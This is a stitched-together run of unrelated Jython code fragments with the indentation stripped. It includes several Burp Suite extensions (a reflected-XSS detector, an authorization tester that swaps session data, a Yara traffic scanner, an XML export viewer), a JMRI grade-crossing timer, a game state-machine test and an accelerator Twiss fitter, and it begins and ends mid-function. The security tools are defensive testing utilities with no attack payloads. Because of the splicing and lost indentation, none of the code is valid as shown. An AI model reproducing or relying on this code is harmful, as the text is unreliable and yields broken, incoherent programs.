if theMachines.get(i).getGoal(theCurrentStates[i], theRole) != theMachines.get(0).getGoal(theCurrentStates[0], theRole):
GamerLogger.log("StateMachine", "Inconsistency between machine #" + i + " and ProverStateMachine over goal value for " + theRole + " of state " + theCurrentStates[0] + ": " + theMachines.get(i).getGoal(theCurrentStates[i], theRole) + " vs " + theMachines.get(0).getGoal(theCurrentStates[0], theRole))
return False
except Exception as e:
GamerLogger.log("StateMachine", "Inconsistency between machine #" + i + " and ProverStateMachine over goal-ness of state " + theCurrentStates[0] + " vs " + theCurrentStates[i])
return False
i += 1
GamerLogger.emitToConsole("]\n")
GamerLogger.log("StateMachine", "Completed automatic consistency testing on " + theSubject.__class__.__name__ + ", w/ " + nRound + " rounds: all tests pass!")
return True
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel):
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Reflected XSS Detector")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
logTable.addMouseListener( CMouseListener(self) )
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Response", self._responseViewer.getComponent())
tabs.addTab("Request", self._requestViewer.getComponent())
self._splitpane.setRightComponent(tabs)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
return
#
# implement ITab
#
def getTabCaption(self):
return "R-XSS Detector"
def getUiComponent(self):
return self._splitpane
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
if not messageIsRequest:
# create a new log entry with the message details
mi = self._callbacks.saveBuffersToTempFiles(messageInfo)
tmp = self._helpers.analyzeRequest(messageInfo).getParameters()
response = bytearray(mi.getResponse())
self._lock.acquire()
for p in tmp:
if response.find(str(p.getValue())) > 0:
row = self._log.size()
headers = self._helpers.analyzeResponse(mi.getResponse()).getHeaders()
cc = ""
for h in headers:
if h.find("Content-Type:") == 0:
cc = h[14:].lower()
accepted_ccs = ['text/html', 'application/json', 'application/x-javascript']
if cc in accepted_ccs:
self._log.add( LogEntry(toolFlag, mi, self._helpers.analyzeRequest(messageInfo).getUrl(), p.getType(), p.getName(), p.getValue() ) )
self.fireTableRowsInserted(row, row)
self._lock.release()
return
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 4
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Tool"
if columnIndex == 1:
return "URL"
if columnIndex == 2:
return "Status"
if columnIndex == 3:
return "Params"
return ""
def getRowAt(self, rowIndex):
return self._log.get(rowIndex)
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return self._callbacks.getToolName(logEntry._tool)
if columnIndex == 1:
return logEntry._url.toString()
if columnIndex == 2:
return logEntry._requestResponse.getStatusCode()
if columnIndex == 3:
types = ['GET','POST','COOKIE']
return str(logEntry._key)+" ("+types[logEntry._key_type]+") = "+logEntry._value
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
# Timer elapsed listener
class timerElapsed(ActionListener):
# Handles the timer elapsed event
def actionPerformed(self, e):
for i in range(islandBlocks.size()) :
if (blocks.getBlock(islandBlocks.get(i)).getState() == jmri.Block.OCCUPIED):
break
else :
print "Timer Fired"
listener.StopGradeCrossing()
# Create the grade crossing listener
listener = GradeCrossingListener()
# Create a timer that calls its elapsed listener after a delay. Stops the grade
# crossing after the delay if the island is not occupied by a train.
timer = Timer(1000 * delay, timerElapsed())
# Add a PropertyChangeListner for each approach block and create the block if it
# does not already exist.
for i in range(approachBlocks.size()) :
blocks.provideBlock(approachBlocks.get(i)).addPropertyChangeListener(listener)
# Add a PropertyChangeListner for each island block and create the block if it
# does not already exist.
for i in range(islandBlocks.size()) :
blocks.provideBlock(islandBlocks.get(i)).addPropertyChangeListener(listener)
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Otter")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane for log entries and request/response viewing
self._settingPanel = JPanel()
self._logPane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# setup settings pane ui
self._settingPanel.setBounds(0,0,1000,1000)
self._settingPanel.setLayout(None)
self._isRegexp = JCheckBox("Use regexp for matching.")
self._isRegexp.setBounds(10, 10, 220, 20)
matchLabel = JLabel("String to Match:")
matchLabel.setBounds(10, 40, 200, 20)
self._matchString = JTextArea("User 1 Session Information")
self._matchString.setWrapStyleWord(True)
self._matchString.setLineWrap(True)
matchString = JScrollPane(self._matchString)
matchString.setVerticalScrollBarPolicy(JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
matchString.setBounds(10, 60, 400, 200)
replaceLabel = JLabel("String to Replace:")
replaceLabel.setBounds(10, 270, 200, 20)
self._replaceString = JTextArea("User 2 Session Information")
self._replaceString.setWrapStyleWord(True)
self._replaceString.setLineWrap(True)
replaceString = JScrollPane(self._replaceString)
replaceString.setVerticalScrollBarPolicy(JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
replaceString.setBounds(10, 290, 400, 200)
self._settingPanel.add(self._isRegexp)
self._settingPanel.add(matchLabel)
self._settingPanel.add(matchString)
self._settingPanel.add(replaceLabel)
self._settingPanel.add(replaceString)
# table of log entries
logTable = Table(self)
logTable.getColumnModel().getColumn(0).setPreferredWidth(700)
logTable.getColumnModel().getColumn(1).setPreferredWidth(150)
logTable.getColumnModel().getColumn(2).setPreferredWidth(100)
logTable.getColumnModel().getColumn(3).setPreferredWidth(130)
logTable.getColumnModel().getColumn(4).setPreferredWidth(100)
logTable.getColumnModel().getColumn(5).setPreferredWidth(130)
scrollPane = JScrollPane(logTable)
self._logPane.setLeftComponent(scrollPane)
# tabs with request/response viewers
logTabs = JTabbedPane()
self._origRequestViewer = callbacks.createMessageEditor(self, False)
self._origResponseViewer = callbacks.createMessageEditor(self, False)
self._modRequestViewer = callbacks.createMessageEditor(self, False)
self._modResponseViewer = callbacks.createMessageEditor(self, False)
logTabs.addTab("Original Request", self._origRequestViewer.getComponent())
logTabs.addTab("Original Response", self._origResponseViewer.getComponent())
logTabs.addTab("Modified Request", self._modRequestViewer.getComponent())
logTabs.addTab("Modified Response", self._modResponseViewer.getComponent())
self._logPane.setRightComponent(logTabs)
# top most tab interface that seperates log entries from settings
maintabs = JTabbedPane()
maintabs.addTab("Log Entries", self._logPane)
maintabs.addTab("Settings", self._settingPanel)
self._maintabs = maintabs
# customize the UI components
callbacks.customizeUiComponent(maintabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
return
#
# implement ITab
#
def getTabCaption(self):
return "Otter"
def getUiComponent(self):
return self._maintabs
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# Only process responses that came from the proxy. This will
# ignore request/responses made by Otter itself.
if not messageIsRequest and toolFlag == self._callbacks.TOOL_PROXY:
# create a new log entry with the message details
row = self._log.size()
# analyze and store information about the original request/response
responseBytes = messageInfo.getResponse()
requestBytes = messageInfo.getRequest()
request = self._helpers.analyzeRequest(messageInfo)
response = self._helpers.analyzeResponse(responseBytes)
# ignore out-of-scope requests.
if not self._callbacks.isInScope(request.getUrl()):
return
wasModified = False
ms = self._matchString.getText()
rs = self._replaceString.getText()
mss = ms.split(",")
rss = rs.split(",")
if len(rss) != len(mss):
mss = [""]
for i,x in enumerate(mss):
if x == "":
continue
if self._isRegexp.isSelected():
if search(x, requestBytes):
requestBytes = sub(x, rss[i], requestBytes)
wasModified = True
else:
if fromBytes(requestBytes).find(x) >= 0:
requestBytes = toBytes(replace(fromBytes(requestBytes), x, rss[i]))
wasModified = True
# make a modified request to test for authorization issues
entry = None
if wasModified:
modReqResp = self._callbacks.makeHttpRequest(messageInfo.getHttpService(), requestBytes)
modRequestBytes = modReqResp.getRequest()
modResponseBytes = modReqResp.getResponse()
modResponse = self._helpers.analyzeResponse(modResponseBytes)
orig = self._callbacks.saveBuffersToTempFiles(messageInfo)
mod = self._callbacks.saveBuffersToTempFiles(modReqResp)
entry = LogEntry(orig, mod, request.getUrl(), response.getStatusCode(), len(responseBytes), modResponse.getStatusCode(), len(modResponseBytes), wasModified)
else:
orig = self._callbacks.saveBuffersToTempFiles(messageInfo)
entry = LogEntry(orig, None, request.getUrl(), response.getStatusCode(), len(responseBytes), "None", 0, wasModified)
self._lock.acquire()
self._log.add(entry)
self.fireTableRowsInserted(row, row)
self._lock.release()
return
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 6
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "URL"
if columnIndex == 1:
return "Request Modified?"
if columnIndex == 2:
return "Orig. Status"
if columnIndex == 3:
return "Orig. Length"
if columnIndex == 4:
return "Mod. Status"
if columnIndex == 5:
return "Mod. Length"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry._url.toString()
if columnIndex == 1:
return str(logEntry._wasModified)
if columnIndex == 2:
return str(logEntry._origStatus)
if columnIndex == 3:
return str(logEntry._origLength)
if columnIndex == 4:
return str(logEntry._modStatus)
if columnIndex == 5:
return str(logEntry._modLength)
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
class BurpExtender(IBurpExtender, ITab, IMessageEditorController, IContextMenuFactory, ActionListener,
AbstractTableModel, Runnable):
#
# Implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# Initialize the global stdout stream
global stdout
# Keep a reference to our callbacks object
self._callbacks = callbacks
# Obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Burpsuite Yara Scanner")
# Create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
splitpane.setLeftComponent(scrollPane)
# Options panel
optionsPanel = JPanel()
optionsPanel.setLayout(GridBagLayout())
constraints = GridBagConstraints()
yara_exe_label = JLabel("Yara Executable Location:")
constraints.fill = GridBagConstraints.HORIZONTAL
constraints.gridx = 0
constraints.gridy = 0
optionsPanel.add(yara_exe_label, constraints)
self._yara_exe_txtField = JTextField(25)
constraints.fill = GridBagConstraints.HORIZONTAL
constraints.gridx = 1
constraints.gridy = 0
optionsPanel.add(self._yara_exe_txtField, constraints)
yara_rules_label = JLabel("Yara Rules File:")
constraints.fill = GridBagConstraints.HORIZONTAL
constraints.gridx = 0
constraints.gridy = 1
optionsPanel.add(yara_rules_label, constraints)
self._yara_rules_files = Vector()
self._yara_rules_files.add("< None >")
self._yara_rules_fileList = JList(self._yara_rules_files)
constraints.fill = GridBagConstraints.HORIZONTAL
constraints.gridx = 1
constraints.gridy = 1
optionsPanel.add(self._yara_rules_fileList, constraints)
self._yara_rules_select_files_button = JButton("Select Files")
self._yara_rules_select_files_button.addActionListener(self)
constraints.fill = GridBagConstraints.HORIZONTAL
constraints.gridx = 1
constraints.gridy = 2
optionsPanel.add(self._yara_rules_select_files_button, constraints)
self._yara_clear_button = JButton("Clear Yara Results Table")
self._yara_clear_button.addActionListener(self)
constraints.fill = GridBagConstraints.HORIZONTAL
constraints.gridx = 1
constraints.gridy = 3
optionsPanel.add(self._yara_clear_button, constraints)
# Tabs with request/response viewers
viewerTabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
viewerTabs.addTab("Request", self._requestViewer.getComponent())
viewerTabs.addTab("Response", self._responseViewer.getComponent())
splitpane.setRightComponent(viewerTabs)
# Tabs for the Yara output and the Options
self._mainTabs = JTabbedPane()
self._mainTabs.addTab("Yara Output", splitpane)
self._mainTabs.addTab("Options", optionsPanel)
# customize our UI components
callbacks.customizeUiComponent(splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(viewerTabs)
callbacks.customizeUiComponent(self._mainTabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# add ourselves as a context menu factory
callbacks.registerContextMenuFactory(self)
# Custom Menu Item
self.menuItem = JMenuItem("Scan with Yara")
self.menuItem.addActionListener(self)
# obtain our output stream
stdout = PrintWriter(callbacks.getStdout(), True)
# Print a startup notification
stdout.println("Burpsuite Yara scanner initialized.")
#
# Implement ITab
#
def getTabCaption(self):
return "Yara"
def getUiComponent(self):
return self._mainTabs
#
# Implement IContextMenuFactory
#
def createMenuItems(self, invocation):
if invocation.getInvocationContext() == invocation.CONTEXT_TARGET_SITE_MAP_TREE:
self.requestResponses = invocation.getSelectedMessages()
return [self.menuItem]
else:
self.requestResponses = None
return None
#
# Implement Action
#
def actionPerformed(self, actionEvent):
global yara_rules
global yara_path
if actionEvent.getSource() is self.menuItem:
yara_path = self._yara_exe_txtField.getText()
yara_rules = self._yara_rules_files
t = Thread(self)
t.start()
elif actionEvent.getSource() is self._yara_clear_button:
# Delete the LogEntry objects from the log
row = self._log.size()
self._lock.acquire()
self._log.clear()
# Update the Table
self.fireTableRowsDeleted(0, row)
# Clear data regarding any selected LogEntry objects from the request / response viewers
self._requestViewer.setMessage([], True)
self._responseViewer.setMessage([], False)
self._currentlyDisplayedItem = None
self._lock.release()
elif actionEvent.getSource() is self._yara_rules_select_files_button:
fileChooser = JFileChooser()
yarFilter = FileNameExtensionFilter("Yara Rules", ["yar"])
fileChooser.addChoosableFileFilter(yarFilter)
fileChooser.setFileFilter(yarFilter)
fileChooser.setMultiSelectionEnabled(True)
fileChooser.setFileSelectionMode(JFileChooser.FILES_ONLY)
ret = fileChooser.showOpenDialog(None)
if ret == JFileChooser.APPROVE_OPTION:
self._yara_rules_files.clear()
for file in fileChooser.getSelectedFiles():
self._yara_rules_files.add(file.getPath())
self._yara_rules_fileList.setListData(self._yara_rules_files)
else:
stdout.println("Unknown Event Received.")
#
# Implement Runnable
#
def run(self):
self.yaraScan()
#
# Extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 2
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Rule Name"
if columnIndex == 1:
return "URL"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry._ruleName
if columnIndex == 1:
return logEntry._url.toString()
return ""
#
# Implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
#
# Implement the Yara scanning logic
#
def yaraScan(self):
# If stdout has not yet been initialized, punt.
if stdout is None:
return
# If the location of the yara executable and rules files are NULL, punt.
if yara_rules is None or yara_path is None or yara_rules.size() == 0 or yara_rules.contains("< None >") or len(yara_path) == 0:
JOptionPane.showMessageDialog(None, "Error: Please specify the path to the yara executable and rules file in "
"the options tab.")
return
# If iRequestResponses is None, punt.
if self.requestResponses is None:
JOptionPane.showMessageDialog(None, "Error: No Request/Responses were selected.")
return
else:
stdout.println("Processing %d item(s)." % len(self.requestResponses))
# Get the OS temp folder
os_name = System.getProperty("os.name").lower()
temp_folder = None
if "linux" in os_name:
temp_folder = "/tmp"
elif "windows" in os_name:
temp_folder = os.environ.get("TEMP")
if temp_folder is None:
temp_folder = os.environ.get("TMP")
if temp_folder is None:
stdout.println("Error: Could not determine TEMP folder location.")
return
# Keep track of the number of matches.
matchCount = 0
# Process the site map selected messages
for idx, iRequestResponse in enumerate(self.requestResponses):
# Process the request
request = iRequestResponse.getRequest()
if request is not None:
if len(request) > 0:
try:
# Yara does not support scanning from stdin so we will need to create a temp file and scan it
req_filename = os.path.join(temp_folder, "req_" + str(idx) + ".tmp")
req_file = open(req_filename, "wb")
req_file.write(request)
req_file.close()
for rules in yara_rules:
yara_req_output = subprocess.check_output([yara_path, rules, req_filename])
if yara_req_output is not None and len(yara_req_output) > 0:
ruleName = (yara_req_output.split())[0]
self._lock.acquire()
row = self._log.size()
# TODO: Don't add duplicate items to the table
self._log.add(LogEntry(ruleName, iRequestResponse, self._helpers.analyzeRequest(iRequestResponse).getUrl()))
self.fireTableRowsInserted(row, row)
self._lock.release()
matchCount += 1
except Exception as e:
JOptionPane.showMessageDialog(None, "Error running Yara. Please check your configuration and rules.")
return
finally:
# Remove the temp file
if req_file is not None:
req_file.close()
os.remove(req_filename)
# Process the response
response = iRequestResponse.getResponse()
if response is not None:
if len(response) > 0:
try:
# Yara does not support scanning from stdin so we will need to create a temp file and scan it
resp_filename = os.path.join(temp_folder, "resp_" + str(idx) + ".tmp")
resp_file = open(resp_filename, "wb")
resp_file.write(response)
resp_file.close()
for rules in yara_rules:
yara_resp_output = subprocess.check_output([yara_path, rules, resp_filename])
if yara_resp_output is not None and len(yara_resp_output) > 0:
ruleName = (yara_resp_output.split())[0]
self._lock.acquire()
row = self._log.size()
# TODO: Don't add duplicate items to the table
self._log.add(LogEntry(ruleName, iRequestResponse, self._helpers.analyzeRequest(iRequestResponse).getUrl()))
self.fireTableRowsInserted(row, row)
self._lock.release()
matchCount += 1
except Exception as e:
JOptionPane.showMessageDialog(None, "Error running Yara. Please check your configuration and rules.")
return
finally:
# Remove the temp file
if resp_file is not None:
resp_file.close()
os.remove(resp_filename)
# Print a completion notification
JOptionPane.showMessageDialog(None, "Yara scanning complete. %d rule(s) matched." % matchCount)
class BurpExtender(IBurpExtender, ITab, IMessageEditorController,
AbstractTableModel):
"""
Implements IBurpExtender
"""
def registerExtenderCallbacks(self, callbacks):
# Save callbacks and helpers for later use
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
# Set extension name
self._callbacks.setExtensionName("Burp XML Export Viewer")
# Create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# Main panel
self._mainPanel = JPanel(BorderLayout())
# Button to load Burp XML Export file
self._loadButton = JButton('Select Burp XML Export File')
self._loadButton.addActionListener(self.loadButtonTapped)
self._mainPanel.add(self._loadButton, BorderLayout.PAGE_START)
# File chooser for Burp XML Export file
self._fc = JFileChooser()
self._fc.setDialogTitle("Select Burp XML Export File")
# Splitpane for table and request/response view
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
self._mainPanel.add(self._splitpane, BorderLayout.CENTER)
# Table of log entries
self._logTable = Table(self)
self._scrollPane = JScrollPane(self._logTable)
self._splitpane.setTopComponent(self._scrollPane)
# Set column width of table
self._logTable.setAutoResizeMode(JTable.AUTO_RESIZE_OFF)
self._logTable.getColumnModel().getColumn(0).setPreferredWidth(40)
self._logTable.getColumnModel().getColumn(1).setPreferredWidth(60)
self._logTable.getColumnModel().getColumn(2).setPreferredWidth(70)
self._logTable.getColumnModel().getColumn(3).setPreferredWidth(300)
self._logTable.getColumnModel().getColumn(4).setPreferredWidth(500)
self._logTable.getColumnModel().getColumn(5).setPreferredWidth(300)
self._logTable.getColumnModel().getColumn(6).setPreferredWidth(100)
self._logTable.getColumnModel().getColumn(7).setPreferredWidth(100)
self._logTable.getColumnModel().getColumn(8).setPreferredWidth(100)
self._logTable.getColumnModel().getColumn(9).setPreferredWidth(100)
self._logTable.getColumnModel().getColumn(10).setPreferredWidth(230)
self._logTable.getColumnModel().getColumn(11).setMaxWidth(100000)
# Tabs with request and response viewers
self._tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
self._tabs.addTab("Request", self._requestViewer.getComponent())
self._tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setBottomComponent(self._tabs)
# Customize UI components
self._callbacks.customizeUiComponent(self._mainPanel)
self._callbacks.customizeUiComponent(self._splitpane)
self._callbacks.customizeUiComponent(self._logTable)
self._callbacks.customizeUiComponent(self._scrollPane)
self._callbacks.customizeUiComponent(self._tabs)
# Add the custom tab to Burp's UI
self._callbacks.addSuiteTab(self)
return
"""
Helper Functions
"""
def loadButtonTapped(self, actionEvent):
# Display the file chooser dialog
retVal = self._fc.showOpenDialog(None)
if retVal == JFileChooser.APPROVE_OPTION:
self._file = self._fc.getSelectedFile()
self.resetList() # clear the table from all previous entries
self.parseXML(
self._file) # parse the file and load all entries to the table
else:
print("Open command cancelled by user.")
def parseXML(self, file):
# Initialize XML stuff
dbFactory = DocumentBuilderFactory.newInstance()
dBuilder = dbFactory.newDocumentBuilder()
doc = dBuilder.parse(file)
doc.getDocumentElement().normalize()
# All entries in Burp's XML Export File have tag <item>...</item>
nodeList = doc.getElementsByTagName("item")
# for i in reversed(range(0, nodeList.getLength())):
for i in range(0, nodeList.getLength()):
node = nodeList.item(i)
if node.getNodeType() == Node.ELEMENT_NODE:
request = node.getElementsByTagName("request").item(
0).getTextContent()
response = node.getElementsByTagName("response").item(
0).getTextContent()
request_isBase64 = node.getElementsByTagName("request").item(
0).getAttribute("base64")
response_isBase64 = node.getElementsByTagName("response").item(
0).getAttribute("base64")
if request_isBase64 == "true":
request = Base64.getDecoder().decode(request)
if response_isBase64 == "true":
response = Base64.getDecoder().decode(response)
info = {
"time":
node.getElementsByTagName("time").item(0).getTextContent(),
"url":
node.getElementsByTagName("url").item(0).getTextContent(),
"host":
node.getElementsByTagName("host").item(0).getTextContent(),
"port":
node.getElementsByTagName("port").item(0).getTextContent(),
"protocol":
node.getElementsByTagName("protocol").item(
0).getTextContent(),
"method":
node.getElementsByTagName("method").item(
0).getTextContent(),
"path":
node.getElementsByTagName("path").item(0).getTextContent(),
"extension":
node.getElementsByTagName("extension").item(
0).getTextContent(),
"request":
request,
"status":
node.getElementsByTagName("status").item(
0).getTextContent(),
"responselength":
node.getElementsByTagName("responselength").item(
0).getTextContent(),
"mimetype":
node.getElementsByTagName("mimetype").item(
0).getTextContent(),
"response":
response,
"comment":
node.getElementsByTagName("comment").item(
0).getTextContent(),
"highlight":
""
}
logEntry = LogEntry(info)
# Remove GET parameters from path component
# Path component usually looks like this: /some/path/index.html?q=foo&z=faa
info["path"] = info["path"].split("?")[0]
# Extract GET parameters
params = []
for param in self._helpers.analyzeRequest(
logEntry).getParameters():
if param.getType() == IParameter.PARAM_URL:
params.append("{}={}".format(param.getName(),
param.getValue()))
info["params"] = "&".join(params)
self.addLogEntryToList(logEntry)
def addLogEntryToList(self, logEntry):
self._lock.acquire()
row = self._log.size()
self._log.add(logEntry)
self.fireTableRowsInserted(row, row)
self._lock.release()
def resetList(self):
self._lock.acquire()
self._log.clear()
self.fireTableRowsInserted(0, 0)
self._lock.release()
"""
Implements ITab
"""
def getTabCaption(self):
return "Burp XML Export Viewer"
def getUiComponent(self):
return self._mainPanel
"""
Extends AbstractTableModel
"""
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 12
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "#"
if columnIndex == 1:
return "Method"
if columnIndex == 2:
return "Protocol"
if columnIndex == 3:
return "Host"
if columnIndex == 4:
return "Path"
if columnIndex == 5:
return "Parameters"
if columnIndex == 6:
return "Status"
if columnIndex == 7:
return "Length"
if columnIndex == 8:
return "MIME type"
if columnIndex == 9:
return "Extension"
if columnIndex == 10:
return "Time"
if columnIndex == 11:
return "Comment"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return "{}".format(rowIndex)
if columnIndex == 1:
return logEntry._info["method"]
if columnIndex == 2:
return logEntry._info["protocol"]
if columnIndex == 3:
return logEntry.getHttpService().getHost()
if columnIndex == 4:
return logEntry._info["path"]
if columnIndex == 5:
return logEntry._info["params"]
if columnIndex == 6:
return logEntry._info["status"]
if columnIndex == 7:
return logEntry._info["responselength"]
if columnIndex == 8:
return logEntry._info["mimetype"]
if columnIndex == 9:
return logEntry._info["extension"]
if columnIndex == 10:
return logEntry._info["time"]
if columnIndex == 11:
return logEntry._info["comment"]
return ""
"""
Implements IMessageEditorController
Allows request and response viewers to obtain details about the messages being displayed
"""
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
def run(self):
tr_twiss_analysis_controller = self.linac_wizard_document.tr_twiss_analysis_controller
transverse_twiss_fitting_controller = tr_twiss_analysis_controller.transverse_twiss_fitting_controller
init_and_fit_params_controller = transverse_twiss_fitting_controller.init_and_fit_params_controller
initial_twiss_params_holder = transverse_twiss_fitting_controller.initial_twiss_params_holder
final_twiss_params_holder = init_and_fit_params_controller.final_twiss_params_holder
nIterations = int(init_and_fit_params_controller.fit_iter_text.getValue())
#print "debug Twiss_Fitter start to run! Iter=",nIterations
(alphaX, betaX, emittX) = initial_twiss_params_holder.getParams(0)
(alphaY, betaY, emittY) = initial_twiss_params_holder.getParams(1)
(alphaZ, betaZ, emittZ) = initial_twiss_params_holder.getParams(2)
twiss_arr = []
twiss_arr.append(Twiss(alphaX, betaX, emittX))
twiss_arr.append(Twiss(alphaY, betaY, emittY))
twiss_arr.append(Twiss(alphaZ, betaZ, emittZ))
(alphaXStep, betaXStep, emittXStep) = initial_twiss_params_holder.getParamsStep(0)
(alphaYStep, betaYStep, emittYStep) = initial_twiss_params_holder.getParamsStep(1)
(alphaZStep, betaZStep, emittZStep) = initial_twiss_params_holder.getParamsStep(2)
variables = ArrayList()
variables.add(Variable("alphaX", alphaX, - Double.MAX_VALUE, Double.MAX_VALUE))
variables.add(Variable("betaX", betaX, - Double.MAX_VALUE, Double.MAX_VALUE))
variables.add(Variable("emittX", emittX, - Double.MAX_VALUE, Double.MAX_VALUE))
variables.add(Variable("alphaY", alphaY, - Double.MAX_VALUE, Double.MAX_VALUE))
variables.add(Variable("betaY", betaY, - Double.MAX_VALUE, Double.MAX_VALUE))
variables.add(Variable("emittY", emittY, - Double.MAX_VALUE, Double.MAX_VALUE))
variables.add(Variable("alphaZ", alphaZ, - Double.MAX_VALUE, Double.MAX_VALUE))
variables.add(Variable("betaZ", betaZ, - Double.MAX_VALUE, Double.MAX_VALUE))
variables.add(Variable("emittZ", emittZ, - Double.MAX_VALUE, Double.MAX_VALUE))
delta_hint = InitialDelta()
variables_fit = ArrayList()
#---------- X
if(alphaXStep != 0.):
variables_fit.add(variables.get(0))
delta_hint.addInitialDelta(variables.get(0), alphaXStep)
if(betaXStep != 0.):
variables_fit.add(variables.get(1))
delta_hint.addInitialDelta(variables.get(1), betaXStep)
if(emittXStep != 0.):
variables_fit.add(variables.get(2))
delta_hint.addInitialDelta(variables.get(2), emittXStep)
#---------- Y
if(alphaYStep != 0.):
variables_fit.add(variables.get(3))
delta_hint.addInitialDelta(variables.get(3), alphaYStep)
if(betaYStep != 0.):
variables_fit.add(variables.get(4))
delta_hint.addInitialDelta(variables.get(4), betaYStep)
if(emittYStep != 0.):
variables_fit.add(variables.get(5))
delta_hint.addInitialDelta(variables.get(5), emittYStep)
#---------- Z
if(alphaZStep != 0.):
variables_fit.add(variables.get(6))
delta_hint.addInitialDelta(variables.get(6), alphaZStep)
if(betaZStep != 0.):
variables_fit.add(variables.get(7))
delta_hint.addInitialDelta(variables.get(7), betaZStep)
if(emittZStep != 0.):
variables_fit.add(variables.get(8))
delta_hint.addInitialDelta(variables.get(8), emittZStep)
#------- fitting process with solver
if(variables_fit.isEmpty()):
return
scorer = AccScoreCalculator(self.linac_wizard_document,variables,twiss_arr)
maxSolutionStopper = SolveStopperFactory.maxEvaluationsStopper(nIterations)
solver = Solver(SimplexSearchAlgorithm(),maxSolutionStopper)
self.solver = solver
problem = ProblemFactory.getInverseSquareMinimizerProblem(variables_fit,scorer,0.001)
problem.addHint(delta_hint)
solver.solve(problem)
#------- get results
trial = solver.getScoreBoard().getBestSolution()
scorer.trialToTwiss(trial)
twiss_arr = scorer.getTwissArr()
(alphaX, betaX, emittX) = (twiss_arr[0].getAlpha(),twiss_arr[0].getBeta(),twiss_arr[0].getEmittance())
(alphaY, betaY, emittY) = (twiss_arr[1].getAlpha(),twiss_arr[1].getBeta(),twiss_arr[1].getEmittance())
(alphaZ, betaZ, emittZ) = (twiss_arr[2].getAlpha(),twiss_arr[2].getBeta(),twiss_arr[2].getEmittance())
final_twiss_params_holder.setParams(0,alphaX, betaX, emittX)
